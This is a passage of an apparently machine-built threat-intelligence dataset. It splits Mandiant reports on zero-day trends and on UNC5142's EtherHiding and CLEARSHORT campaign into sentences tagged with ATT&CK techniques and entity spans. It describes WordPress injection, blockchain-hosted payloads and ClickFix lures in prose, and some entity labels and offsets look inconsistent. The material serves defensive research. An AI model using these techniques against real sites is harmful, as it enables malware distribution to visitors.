"T1609", "name": "Container Administration Command" } ], "procedure": "utilized a watering hole on a compromised cryptocurrency news website redirecting to an attacker-controlled domain hosting the same CVE-2024-9680 and CVE-2024-49039 exploit", "entities": [ { "text": "This actor", "start": 0, "end": 10, "label": "ThreatActor" }, { "text": "utilized", "start": 11, "end": 19, "label": "Action" }, { "text": "CVE-2024-9680 ", "start": 155, "end": 169, "label": "Infrastructure_Indicator" }, { "text": " CVE-2024-49039", "start": 172, "end": 187, "label": "Infrastructure_Indicator" }, { "text": " exploit", "start": 187, "end": 195, "label": "MalwareTool" }, { "text": "watering hole", "start": 22, "end": 35, "label": "MalwareTool" }, { "text": "compromised cryptocurrency news website", "start": 53, "end": 92, "label": "Infrastructure_Indicator" }, { "text": "attacker-controlled domain", "start": 111, "end": 137, "label": "Infrastructure_Indicator" }, { "text": "hosting", "start": 138, "end": 145, "label": "Action" } ] }, { "uid": "mandiant-35_mandiant_report-p1-s139-1d2978", "source": "mandiant", "doc_id": "35_mandiant_report", "page_number": 1, "sentence_id": 139, "context_before": "This actor utilized a watering hole on a legitimate, compromised cryptocurrency news website redirecting to an attacker-controlled domain hosting the same CVE-2024-9680 and CVE-2024-49039 exploit.", "sentence_text": "Outlook and Implications Defending against zero-day exploitation continues to be a race of strategy and prioritization.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-35_mandiant_report-p1-s140-0bf5af", "source": "mandiant", "doc_id": "35_mandiant_report", "page_number": 1, "sentence_id": 140, "context_before": "Outlook and Implications Defending against zero-day exploitation continues to be a race of strategy and prioritization.", "sentence_text": "Not only are zero-day vulnerabilities becoming easier to procure, but attackers finding use in new types of technology may strain less experienced vendors.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-35_mandiant_report-p1-s141-03675a", "source": "mandiant", "doc_id": "35_mandiant_report", "page_number": 1, "sentence_id": 141, "context_before": "Not only are zero-day vulnerabilities becoming easier to procure, but attackers finding use in new types of technology may strain less experienced vendors.", "sentence_text": "While organizations have historically been left to prioritize patching processes based on personal or organizational threats and attack surfaces, broader trends can inform a more specific approach alongside lessons learned from major vendors' mitigation efforts.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-35_mandiant_report-p1-s142-8f27f5", "source": "mandiant", "doc_id": "35_mandiant_report", "page_number": 1, "sentence_id": 142, "context_before": "While organizations have historically been left to prioritize patching processes based on personal or organizational threats and attack surfaces, broader trends can inform a more specific approach alongside lessons learned from major vendors' mitigation efforts.", "sentence_text": "We expect zero-day vulnerabilities to maintain their allure to threat actors as opportunities for stealth, persistence, and detection evasion.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-35_mandiant_report-p1-s143-c6633e", "source": "mandiant", "doc_id": "35_mandiant_report", "page_number": 1, "sentence_id": 143, "context_before": "We expect zero-day vulnerabilities to maintain their allure to threat actors as opportunities for stealth, persistence, and detection evasion.", "sentence_text": "While we observed trends regarding improved vendor security posture and decreasing numbers around certain historically popular products—particularly mobile and browsers—we anticipate that zero-day exploitation will continue to rise steadily.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-35_mandiant_report-p1-s144-a3318a", "source": "mandiant", "doc_id": "35_mandiant_report", "page_number": 1, "sentence_id": 144, "context_before": "While we observed trends regarding improved vendor security posture and decreasing numbers around certain historically popular products—particularly mobile and browsers—we anticipate that zero-day exploitation will continue to rise steadily.", "sentence_text": "Phones and browsers will almost certainly remain popular targets, although enterprise software and appliances will likely see a continued rise in zero-day exploitation.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-35_mandiant_report-p1-s145-3f6535", "source": "mandiant", "doc_id": "35_mandiant_report", "page_number": 1, "sentence_id": 145, "context_before": "Phones and browsers will almost certainly remain popular targets, although enterprise software and appliances will likely see a continued rise in zero-day exploitation.", "sentence_text": "Big tech companies have been victims of zero-day exploitation before and will continue to be targeted.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-35_mandiant_report-p1-s146-20c8f0", "source": "mandiant", "doc_id": "35_mandiant_report", "page_number": 1, "sentence_id": 146, "context_before": "Big tech companies have been victims of zero-day exploitation before and will continue to be targeted.", "sentence_text": "For newly targeted vendors and those with products in the growing prevalence of targeted enterprise products, security practices and procedures should evolve to consider how successful exploitation of these products could bypass typical protection mechanisms.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-35_mandiant_report-p1-s147-65addf", "source": "mandiant", "doc_id": "35_mandiant_report", "page_number": 1, "sentence_id": 147, "context_before": "For newly targeted vendors and those with products in the growing prevalence of targeted enterprise products, security practices and procedures should evolve to consider how successful exploitation of these products could bypass typical protection mechanisms.", "sentence_text": "Preventing successful exploitation will rely heavily on these vendors' abilities to enforce proper and safe coding practices.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-35_mandiant_report-p1-s148-de3def", "source": "mandiant", "doc_id": "35_mandiant_report", "page_number": 1, "sentence_id": 148, "context_before": "Preventing successful exploitation will rely heavily on these vendors' abilities to enforce proper and safe coding practices.", "sentence_text": "We continue to see the same types of vulnerabilities exploited over time, indicating patterns in what weaknesses attackers seek out and find most beneficial to exploit.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-35_mandiant_report-p1-s149-10e330", "source": "mandiant", "doc_id": "35_mandiant_report", "page_number": 1, "sentence_id": 149, "context_before": "We continue to see the same types of vulnerabilities exploited over time, indicating patterns in what weaknesses attackers seek out and find most beneficial to exploit.", "sentence_text": "Continued existence and exploitation of similar issues makes zero-days easier; threat actors know what to look for and where exploitable weaknesses are most pervasive.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-35_mandiant_report-p1-s150-99b013", "source": "mandiant", "doc_id": "35_mandiant_report", "page_number": 1, "sentence_id": 150, "context_before": "Continued existence and exploitation of similar issues makes zero-days easier; threat actors know what to look for and where exploitable weaknesses are most pervasive.", "sentence_text": "Vendors should account for this shift in threat activity and address gaps in configurations and architectural decisions that could permit exploitation of a single product to cause irreparable damage.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-35_mandiant_report-p1-s151-be6501", "source": "mandiant", "doc_id": "35_mandiant_report", "page_number": 1, "sentence_id": 151, "context_before": "Vendors should account for this shift in threat activity and address gaps in configurations and architectural decisions that could permit exploitation of a single product to cause irreparable damage.", "sentence_text": "This is especially true for highly valuable tools with administrator access and/or widespread reach across systems and networks.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-35_mandiant_report-p1-s152-781ffb", "source": "mandiant", "doc_id": "35_mandiant_report", "page_number": 1, "sentence_id": 152, "context_before": "This is especially true for highly valuable tools with administrator access and/or widespread reach across systems and networks.", "sentence_text": "Best practices continue to represent a minimum threshold of what security standards an architecture should demonstrate, including zero-trust fundamentals such as least-privilege access and network segmentation.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-35_mandiant_report-p1-s153-571177", "source": "mandiant", "doc_id": "35_mandiant_report", "page_number": 1, "sentence_id": 153, "context_before": "Best practices continue to represent a minimum threshold of what security standards an architecture should demonstrate, including zero-trust fundamentals such as least-privilege access and network segmentation.", "sentence_text": "GTIG recommends acute threat surface awareness and respective due diligence in order to defend against today's zero-day threat landscape.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-35_mandiant_report-p1-s154-573a6e", "source": "mandiant", "doc_id": "35_mandiant_report", "page_number": 1, "sentence_id": 154, "context_before": "GTIG recommends acute threat surface awareness and respective due diligence in order to defend against today's zero-day threat landscape.", "sentence_text": "Zero-day exploitation will ultimately be dictated by vendors' decisions and ability to counter threat actors' objectives and pursuits.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-35_mandiant_report-p1-s155-5eabb5", "source": "mandiant", "doc_id": "35_mandiant_report", "page_number": 1, "sentence_id": 155, "context_before": "Zero-day exploitation will ultimately be dictated by vendors' decisions and ability to counter threat actors' objectives and pursuits.", "sentence_text": "Posted in\nThreat Intelligence\nRelated articles\nThreat Intelligence\nKeys to the Kingdom: A Defender's Guide to Privileged Account Monitoring By Mandiant • 39-minute read Threat Intelligence Help Wanted: Vietnamese Actors Using Fake Job", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-35_mandiant_report-p1-s156-73116a", "source": "mandiant", "doc_id": "35_mandiant_report", "page_number": 1, "sentence_id": 156, "context_before": "Posted in\nThreat Intelligence\nRelated articles\nThreat Intelligence\nKeys to the Kingdom: A Defender's Guide to Privileged Account Monitoring By Mandiant • 39-minute read Threat Intelligence Help Wanted: Vietnamese Actors Using Fake Job", "sentence_text": "Posting Campaigns to Deliver Malware and Steal Credentials By Google Threat Intelligence Group • 6-minute read Threat Intelligence Pro-Russia Information Operations Leverage Russian Drone Incursions into Polish Airspace By Google Threat Intelligence Group • 7-minute read Threat Intelligence To Be (A Robot) or Not to Be: New Malware Attributed to Russia State-Sponsored COLDRIVER By Google Threat Intelligence Group • 12-minute read", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-36_mandiant_report-p1-s1-6784fa", "source": "mandiant", "doc_id": "36_mandiant_report", "page_number": 1, "sentence_id": 1, "context_before": "", "sentence_text": "New Group on the Block: UNC5142 Leverages EtherHiding to Distribute Malware", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1105", "name": "Ingress Tool Transfer" } ], "procedure": "UNC5142 leverages EtherHiding to distribute Malware", "entities": [ { "text": "New Group ", "start": 0, "end": 10, "label": "ThreatActor" }, { "text": " Leverages", "start": 31, "end": 41, "label": "Action" }, { "text": "Distribute", "start": 57, "end": 67, "label": "Action" }, { "text": " Malware", "start": 67, "end": 75, "label": "MalwareTool" }, { "text": "UNC5142", "start": 24, "end": 31, "label": "ThreatActor" }, { "text": "EtherHiding ", "start": 42, "end": 54, "label": "Infrastructure_Indicator" } ] }, { "uid": "mandiant-36_mandiant_report-p1-s2-85f047", "source": "mandiant", "doc_id": "36_mandiant_report", "page_number": 1, "sentence_id": 2, "context_before": "New Group on the Block: UNC5142 Leverages EtherHiding to Distribute Malware", "sentence_text": "UNC5142 is characterized by its use of compromised WordPress websites and \"EtherHiding \" , a technique used to obscure malicious code or data by placing it on a public blockchain, such as the BNB Smart Chain .", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" }, { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1584.004", "name": "Compromise Infrastructure: Server" }, { "id": "T1027", "name": "Obfuscated Files or Information" } ], "procedure": "Use compromised WordPress websites and EtherHiding to obscure malicious code or data by placing it on a public blockchain.", "entities": [ { "text": "UNC5142", "start": 0, "end": 7, "label": "ThreatActor" }, { "text": "use of compromised WordPress websites", "start": 32, "end": 69, "label": "Action" }, { "text": "compromised WordPress websites", "start": 39, "end": 69, "label": "Infrastructure_Indicator" }, { "text": "EtherHiding", "start": 75, "end": 86, "label": "MalwareTool" }, { "text": "obscure malicious code or data", "start": 111, "end": 141, "label": "Action" }, { "text": "placing it on a public blockchain", "start": 145, "end": 178, "label": "Action" }, { "text": "public blockchain", "start": 161, "end": 178, "label": "Infrastructure_Indicator" }, { "text": "BNB Smart Chain", "start": 192, "end": 207, "label": "Infrastructure_Indicator" } ] }, { "uid": "mandiant-36_mandiant_report-p1-s3-2bae54", "source": "mandiant", "doc_id": "36_mandiant_report", "page_number": 1, "sentence_id": 3, "context_before": "UNC5142 is characterized by its use of compromised WordPress websites and \"EtherHiding \" , a technique used to obscure malicious code or data by placing it on a public blockchain, such as the BNB Smart Chain .", "sentence_text": "This post is part of a two-part blog series on adversaries using the EtherHiding technique.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-36_mandiant_report-p1-s4-4df009", "source": "mandiant", "doc_id": "36_mandiant_report", "page_number": 1, "sentence_id": 4, "context_before": "This post is part of a two-part blog series on adversaries using the EtherHiding technique.", "sentence_text": "UNC5142 appears to indiscriminately target vulnerable WordPress sites, leading to widespread and opportunistic campaigns that impact a range of industry and geographic regions.", "relevant": "yes", "tactic": [ { "id": "TA0043", "name": "Reconnaissance" } ], "techniques": [ { "id": "T1595", "name": "Active Scanning" } ], "procedure": "Indiscriminately targeting vulnerable WordPress sites", "entities": [ { "text": "UNC5142", "start": 0, "end": 7, "label": "ThreatActor" }, { "text": "WordPress sites", "start": 54, "end": 69, "label": "Infrastructure_Indicator" }, { "text": "appears", "start": 8, "end": 15, "label": "Action" }, { "text": " target", "start": 35, "end": 42, "label": "Action" } ] }, { "uid": "mandiant-36_mandiant_report-p1-s5-7d3567", "source": "mandiant", "doc_id": "36_mandiant_report", "page_number": 1, "sentence_id": 5, "context_before": "UNC5142 appears to indiscriminately target vulnerable WordPress sites, leading to widespread and opportunistic campaigns that impact a range of industry and geographic regions.", "sentence_text": "As of June 2025, GTIG had identified approximately 14,000 web pages containing injected JavaScript consistent with an UNC5142 compromised website.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-36_mandiant_report-p1-s6-7a6d3d", "source": "mandiant", "doc_id": "36_mandiant_report", "page_number": 1, "sentence_id": 6, "context_before": "As of June 2025, GTIG had identified approximately 14,000 web pages containing injected JavaScript consistent with an UNC5142 compromised website.", "sentence_text": "GTIG does not currently attribute these final payloads to UNC5142 as it is possible these payloads are distributed on behalf of other threat actors.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-36_mandiant_report-p1-s7-fb3ca4", "source": "mandiant", "doc_id": "36_mandiant_report", "page_number": 1, "sentence_id": 7, "context_before": "GTIG does not currently attribute these final payloads to UNC5142 as it is possible these payloads are distributed on behalf of other threat actors.", "sentence_text": "UNC5142 Attack Overview", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-36_mandiant_report-p1-s8-f52e20", "source": "mandiant", "doc_id": "36_mandiant_report", "page_number": 1, "sentence_id": 8, "context_before": "UNC5142 Attack Overview", "sentence_text": "An UNC5142 infection chain typically involves the following key components or techniques:\nCLEARSHORT\n: A multistage JavaScript downloader to facilitate the distribution of payloads Compromised WordPress Websites:\nWebsites running vulnerable versions of WordPress, or using vulnerable plugins/themes Smart Contracts:\nSelf-executing contracts stored on the BNB Smart Chain (BSC) blockchain EtherHiding :", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1105", "name": "Ingress Tool Transfer" } ], "procedure": "Using a JavaScript downloader, compromised WordPress, smart contracts, and EtherHiding", "entities": [ { "text": " UNC5142", "start": 2, "end": 10, "label": "ThreatActor" }, { "text": "infection chain", "start": 11, "end": 26, "label": "MalwareTool" }, { "text": "JavaScript downloader", "start": 116, "end": 137, "label": "MalwareTool" }, { "text": " payloads", "start": 171, "end": 180, "label": "MalwareTool" }, { "text": "Compromised WordPress Websites", "start": 181, "end": 211, "label": "Infrastructure_Indicator" }, { "text": "plugins/themes", "start": 284, "end": 298, "label": "MalwareTool" }, { "text": "Websites ", "start": 213, "end": 222, "label": "Infrastructure_Indicator" }, { "text": " facilitate ", "start": 140, "end": 152, "label": "Action" }, { "text": " using", "start": 266, "end": 272, "label": "Action" }, { "text": " stored", "start": 340, "end": 347, "label": "Action" }, { "text": "EtherHiding", "start": 388, "end": 399, "label": "Infrastructure_Indicator" }, { "text": " BNB Smart Chain ", "start": 354, "end": 371, "label": "Infrastructure_Indicator" }, { "text": " Smart Contracts", "start": 298, "end": 314, "label": "Infrastructure_Indicator" }, { "text": "CLEARSHORT", "start": 90, "end": 100, "label": "MalwareTool" } ] }, { "uid": "mandiant-36_mandiant_report-p1-s9-576746", "source": "mandiant", "doc_id": "36_mandiant_report", "page_number": 1, "sentence_id": 9, "context_before": "An UNC5142 infection chain typically involves the following key components or techniques:\nCLEARSHORT\n: A multistage JavaScript downloader to facilitate the distribution of payloads Compromised WordPress Websites:\nWebsites running vulnerable versions of WordPress, or using vulnerable plugins/themes Smart Contracts:\nSelf-executing contracts stored on the BNB Smart Chain (BSC) blockchain EtherHiding :", "sentence_text": "A technique used to obscure malicious code or data by placing it on a public blockchain.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-36_mandiant_report-p1-s10-055a2b", "source": "mandiant", "doc_id": "36_mandiant_report", "page_number": 1, "sentence_id": 10, "context_before": "A technique used to obscure malicious code or data by placing it on a public blockchain.", "sentence_text": "UNC5142 relies heavily on the BNB Smart Chain to store its malicious components in smart contracts, making them harder for traditional website security tools to detect and block CLEARSHORT CLEARSHORT is a multistage JavaScript downloader used to facilitate malware distribution.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1027", "name": "Obfuscated Files or Information" } ], "procedure": "Storing malicious components in BSC smart contracts and using CLEARSHORT for malware distribution", "entities": [ { "text": "UNC5142", "start": 0, "end": 7, "label": "ThreatActor" }, { "text": "BNB Smart Chain", "start": 30, "end": 45, "label": "Infrastructure_Indicator" }, { "text": " malicious components ", "start": 58, "end": 80, "label": "MalwareTool" }, { "text": "smart contracts", "start": 83, "end": 98, "label": "Infrastructure_Indicator" }, { "text": " making ", "start": 99, "end": 107, "label": "Action" }, { "text": "JavaScript downloader", "start": 216, "end": 237, "label": "MalwareTool" }, { "text": "malware distribution", "start": 257, "end": 277, "label": "Action" }, { "text": " CLEARSHORT", "start": 177, "end": 188, "label": "MalwareTool" } ] }, { "uid": "mandiant-36_mandiant_report-p1-s11-f36a29", "source": "mandiant", "doc_id": "36_mandiant_report", "page_number": 1, "sentence_id": 11, "context_before": "UNC5142 relies heavily on the BNB Smart Chain to store its malicious components in smart contracts, making them harder for traditional website security tools to detect and block CLEARSHORT CLEARSHORT is a multistage JavaScript downloader used to facilitate malware distribution.", "sentence_text": "The first stage consists of a JavaScript payload injected into vulnerable websites, designed to retrieve the second-stage payload from a malicious smart contract.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-36_mandiant_report-p1-s12-6c7e05", "source": "mandiant", "doc_id": "36_mandiant_report", "page_number": 1, "sentence_id": 12, "context_before": "The first stage consists of a JavaScript payload injected into vulnerable websites, designed to retrieve the second-stage payload from a malicious smart contract.", "sentence_text": "The CLEARSHORT landing page leverages ClickFix, a popular social engineering technique aimed at luring victims to locally run a malicious command using the Windows Run dialog box.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1218", "name": "System Binary Proxy Execution" } ], "procedure": "Leveraging ClickFix social engineering via the Windows Run dialog", "entities": [ { "text": "CLEARSHORT", "start": 4, "end": 14, "label": "MalwareTool" }, { "text": " ClickFix", "start": 37, "end": 46, "label": "Infrastructure_Indicator" }, { "text": "Windows Run dialog box", "start": 156, "end": 178, "label": "Infrastructure_Indicator" }, { "text": "run a malicious command", "start": 122, "end": 145, "label": "Action" } ] }, { "uid": "mandiant-36_mandiant_report-p1-s13-1845c8", "source": "mandiant", "doc_id": "36_mandiant_report", "page_number": 1, "sentence_id": 13, "context_before": "The CLEARSHORT landing page leverages ClickFix, a popular social engineering technique aimed at luring victims to locally run a malicious command using the Windows Run dialog box.", "sentence_text": "CLEARSHORT is an evolution of the CLEARFAKE downloader, which UNC5142 previously leveraged in their operations from late 2023 through mid-2024.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1588.001", "name": "Malware" } ], "procedure": "Threat actor UNC5142 leveraged the CLEARSHORT/CLEARFAKE downloader in operations during 2023–2024.", "entities": [ { "text": "UNC5142", "start": 62, "end": 69, "label": "ThreatActor" }, { "text": "CLEARFAKE downloader", "start": 34, "end": 54, "label": "MalwareTool" }, { "text": "CLEARSHORT", "start": 0, "end": 10, "label": "MalwareTool" }, { "text": " leveraged in their operations", "start": 80, "end": 110, "label": "Action" } ] }, { "uid": "mandiant-36_mandiant_report-p1-s14-3d6241", "source": "mandiant", "doc_id": "36_mandiant_report", "page_number": 1, "sentence_id": 14, "context_before": "CLEARSHORT is an evolution of the CLEARFAKE downloader, which UNC5142 previously leveraged in their operations from late 2023 through mid-2024.", "sentence_text": "CLEARFAKE is a malicious JavaScript framework that masquerades as a Google Chrome browser update notification.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1036.008", "name": "Masquerade File Type" } ], "procedure": "CLEARFAKE masquerades as a Google Chrome browser update notification", "entities": [ { "text": "CLEARFAKE", "start": 0, "end": 9, "label": "MalwareTool" }, { "text": "malicious JavaScript framework ", "start": 15, "end": 46, "label": "MalwareTool" }, { "text": "masquerades", "start": 51, "end": 62, "label": "Action" }, { "text": "Google Chrome browser", "start": 68, "end": 89, "label": "Infrastructure_Indicator" } ] }, { "uid": "mandiant-36_mandiant_report-p1-s15-165cb5", "source": "mandiant", "doc_id": "36_mandiant_report", "page_number": 1, "sentence_id": 15, "context_before": "CLEARFAKE is a malicious JavaScript framework that masquerades as a Google Chrome browser update notification.", "sentence_text": "The primary function of the embedded JavaScript is to download a payload after the user clicks the \"Update Chrome\" button.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1566", "name": "Phishing" } ], "procedure": "Downloading a payload after user interaction", "entities": [ { "text": "JavaScript", "start": 37, "end": 47, "label": "MalwareTool" }, { "text": " download ", "start": 53, "end": 63, "label": "Action" }, { "text": " payload", "start": 64, "end": 72, "label": "MalwareTool" }, { "text": "Chrome", "start": 107, "end": 113, "label": "Infrastructure_Indicator" } ] }, { "uid": "mandiant-36_mandiant_report-p1-s16-ee03fa", "source": "mandiant", "doc_id": "36_mandiant_report", "page_number": 1, "sentence_id": 16, "context_before": "The primary function of the embedded JavaScript is to download a payload after the user clicks the \"Update Chrome\" button.", "sentence_text": "The second-stage payload is a Base64-encoded JavaScript code stored in a smart contract deployed on the BNB Smart Chain Compromised WordPress Sites", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1027", "name": "Obfuscated Files or Information" } ], "procedure": "Storing a Base64-encoded payload in a BSC smart contract", "entities": [ { "text": " BNB Smart Chain Compromised WordPress Sites", "start": 103, "end": 147, "label": "Infrastructure_Indicator" }, { "text": "payload", "start": 17, "end": 24, "label": "MalwareTool" }, { "text": " smart contract", "start": 72, "end": 87, "label": "Infrastructure_Indicator" }, { "text": "Base64-encoded JavaScript code", "start": 30, "end": 60, "label": "MalwareTool" } ] }, { "uid": "mandiant-36_mandiant_report-p1-s17-66d94c", "source": "mandiant", "doc_id": "36_mandiant_report", "page_number": 1, "sentence_id": 17, "context_before": "The second-stage payload is a Base64-encoded JavaScript code stored in a smart contract deployed on the BNB Smart Chain Compromised WordPress Sites", "sentence_text": "The attack begins from the compromise of a vulnerable WordPress website which is exploited to gain unauthorized access.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1190", "name": "Exploit Public-Facing Application" } ], "procedure": "The compromise of a vulnerable WordPress website is exploited to gain unauthorized access", "entities": [ { "text": " WordPress website", "start": 53, "end": 71, "label": "Infrastructure_Indicator" }, { "text": "exploited", "start": 81, "end": 90, "label": "Action" }, { "text": " gain unauthorized access", "start": 93, "end": 118, "label": "Action" } ] }, { "uid": "mandiant-36_mandiant_report-p1-s18-2ce65f", "source": "mandiant", "doc_id": "36_mandiant_report", "page_number": 1, "sentence_id": 18, "context_before": "The attack begins from the compromise of a vulnerable WordPress website which is exploited to gain unauthorized access.", "sentence_text": "UNC5142 injects malicious JavaScript (CLEARSHORT stage 1) code into one of three locations:", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1059.007", "name": "JavaScript" } ], "procedure": "injects malicious JavaScript", "entities": [ { "text": "UNC5142", "start": 0, "end": 7, "label": "ThreatActor" }, { "text": " injects", "start": 7, "end": 15, "label": "Action" }, { "text": "malicious JavaScript", "start": 16, "end": 36, "label": "MalwareTool" }, { "text": "CLEARSHORT", "start": 38, "end": 48, "label": "MalwareTool" } ] }, { "uid": "mandiant-36_mandiant_report-p1-s19-8ca3f7", "source": "mandiant", "doc_id": "36_mandiant_report", "page_number": 1, "sentence_id": 19, "context_before": "UNC5142 injects malicious JavaScript (CLEARSHORT stage 1) code into one of three locations:", "sentence_text": "Plugin directories:\nModifying existing plugin files or adding new malicious files Theme files:\nModifying theme files (like header.php , footer.php , or index.php ) to include the malicious script Database:\nIn some cases, the malicious code is injected directly into the WordPress database What is a Smart Contract?\nSmart contracts are programs stored on a blockchain, like the BNB Smart Chain (BSC), that run automatically when a specified trigger occurs.", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1505", "name": "Server Software Component" } ], "procedure": "Injecting code into WordPress plugins, themes, database, and using smart contracts", "entities": [ { "text": "malicious files", "start": 66, "end": 81, "label": "MalwareTool" }, { "text": "Modifying", "start": 20, "end": 29, "label": "Action" }, { "text": "adding", "start": 55, "end": 61, "label": "Action" }, { "text": "Modifying", "start": 95, "end": 104, "label": "Action" }, { "text": "malicious script Database", "start": 179, "end": 204, "label": "MalwareTool" }, { "text": "malicious code", "start": 225, "end": 239, "label": "MalwareTool" }, { "text": "injected", "start": 243, "end": 251, "label": "Action" }, { "text": "WordPress database", "start": 270, "end": 288, "label": "Infrastructure_Indicator" }, { "text": "Smart contracts ", "start": 315, "end": 331, "label": "Infrastructure_Indicator" }, { "text": " BNB Smart Chain (BSC)", "start": 376, "end": 398, "label": "Infrastructure_Indicator" }, { "text": " header.php ", "start": 122, "end": 134, "label": "Infrastructure_Indicator" }, { "text": "footer.php ", "start": 136, "end": 147, "label": "Infrastructure_Indicator" }, { "text": " index.php", "start": 151, "end": 161, "label": "Infrastructure_Indicator" }, { "text": "theme files", "start": 105, "end": 116, "label": "Infrastructure_Indicator" }, { "text": "plugin files", "start": 39, "end": 51, "label": "Infrastructure_Indicator" }, { "text": "Plugin directories", "start": 0, "end": 18, "label": "Infrastructure_Indicator" }, { "text": "run ", "start": 405, "end": 409, "label": "Action" } ] }, { "uid": "mandiant-36_mandiant_report-p1-s20-229451", "source": "mandiant", "doc_id": "36_mandiant_report", "page_number": 1, "sentence_id": 20, "context_before": "Plugin directories:\nModifying existing plugin files or adding new malicious files Theme files:\nModifying theme files (like header.php , footer.php , or index.php ) to include the malicious script Database:\nIn some cases, the malicious code is injected directly into the WordPress database What is a Smart Contract?\nSmart contracts are programs stored on a blockchain, like the BNB Smart Chain (BSC), that run automatically when a specified trigger occurs.", "sentence_text": "While these triggers can be complex, CLEARSHORT uses a simpler method by calling a function that tells the contract to execute and return a pre-stored piece of data.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1071", "name": "Application Layer Protocol" } ], "procedure": "Calling a function to execute a smart contract and return data", "entities": [ { "text": "CLEARSHORT ", "start": 37, "end": 48, "label": "MalwareTool" }, { "text": "uses ", "start": 48, "end": 53, "label": "Action" }, { "text": " execute", "start": 118, "end": 126, "label": "Action" }, { "text": " return", "start": 130, "end": 137, "label": "Action" }, { "text": "contract", "start": 107, "end": 115, "label": "Infrastructure_Indicator" }, { "text": "calling a function", "start": 73, "end": 91, "label": "Action" } ] }, { "uid": "mandiant-36_mandiant_report-p1-s21-488399", "source": "mandiant", "doc_id": "36_mandiant_report", "page_number": 1, "sentence_id": 21, "context_before": "While these triggers can be complex, CLEARSHORT uses a simpler method by calling a function that tells the contract to execute and return a pre-stored piece of data.", "sentence_text": "Smart contracts provide several advantages for threat actors to use in their operations, including:\nObfuscation:", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1027", "name": "Obfuscated Files or Information" } ], "procedure": "Using smart contracts for obfuscation", "entities": [ { "text": "threat actors", "start": 47, "end": 60, "label": "Action" }, { "text": "Obfuscation", "start": 100, "end": 111, "label": "Action" }, { "text": "Smart contracts", "start": 0, "end": 15, "label": "Infrastructure_Indicator" }, { "text": "use", "start": 64, "end": 67, "label": "Action" } ] }, { "uid": "mandiant-36_mandiant_report-p1-s22-2f0777", "source": "mandiant", "doc_id": "36_mandiant_report", "page_number": 1, "sentence_id": 22, "context_before": "Smart contracts provide several advantages for threat actors to use in their operations, including:\nObfuscation:", "sentence_text": "Storing malicious code within a smart contract makes it harder to detect with traditional web security tools that might scan website content directly.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1027", "name": "Obfuscated Files or Information" } ], "procedure": "Storing malicious code in smart contracts to evade detection", "entities": [ { "text": "malicious code", "start": 8, "end": 22, "label": "MalwareTool" }, { "text": "Storing", "start": 0, "end": 7, "label": "Action" }, { "text": " smart contract", "start": 31, "end": 46, "label": "Infrastructure_Indicator" }, { "text": "scan", "start": 120, "end": 124, "label": "Action" } ] }, { "uid": "mandiant-36_mandiant_report-p1-s23-756ac9", "source": "mandiant", "doc_id": "36_mandiant_report", "page_number": 1, "sentence_id": 23, "context_before": "Storing malicious code within a smart contract makes it harder to detect with traditional web security tools that might scan website content directly.", "sentence_text": "Mutability (and Agility):\nWhile smart 